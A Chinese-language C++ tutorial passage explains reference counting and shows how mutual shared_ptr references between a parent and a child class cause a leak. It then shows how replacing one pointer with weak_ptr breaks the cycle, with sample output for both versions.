  • 当对象被创建时,计数为 “1”,每创建一个变量引用该对象时,该对象的计数就增加“1”,当上述变量销毁时,对象的计数减 “1”,当计数为 “0” 时,这个对象也就被析构了
  • 强引用计数在很多种情况下都是可以正常工作的,但是也有不凑效的时候,当出现循环引用时,就会出现严重的问题
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
#include <iostream>
#include <memory>
using namespace std;

class parent;
class children;
typedef shared_ptr<parent> parent_ptr;
typedef shared_ptr<children> children_ptr;
typedef weak_ptr<parent> parent_ptr2;

class parent{
public:
~parent() { std::cout <<"destroying parent\n"; }
public:
children_ptr children;
};

class children{
public:
~children() { std::cout <<"destroying children\n"; }
public:
parent_ptr parent;
};

void test(){
parent_ptr father(new parent());
children_ptr son(new children());

father->children = son;
son->parent = father;
cout << "father count = " << father.use_count() << endl;
cout << "son count = " << son.use_count() << endl;
}

int main(){
std::cout<<"begin test\n";
test();
std::cout<<"end test\n";
}
  • 由于 parentchildren 对象互相引用,它们的引用计数都是 “2”,不能自动释放
  • 并且此时这两个对象再无法访问到
1
2
3
4
begin test
father count = 2
son count = 2
end test

使用弱引用 weak_ptr 即可打破循环:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
#include <iostream>
#include <memory>
using namespace std;

class parent;
class children;
typedef shared_ptr<parent> parent_ptr;
typedef shared_ptr<children> children_ptr;
typedef weak_ptr<parent> parent_ptr2;

class parent{
public:
~parent() { std::cout <<"destroying parent\n"; }
public:
children_ptr children;
};

class children{
public:
~children() { std::cout <<"destroying children\n"; }
public:
parent_ptr2 parent;
};

void test(){
parent_ptr father(new parent());
children_ptr son(new children());

father->children = son;
son->parent = father;
cout << "father count = " << father.use_count() << endl;
cout << "son count = " << son.use_count() << endl;
}

int main(){
std::cout<<"begin test\n";
test();
std::cout<<"end test\n";
}
1
2
3
4
5
6
begin test
father count = 1 /* 由于children使用弱指针,因此children并不会使father的计数器增加 */
son count = 2
destroying parent
destroying children
end test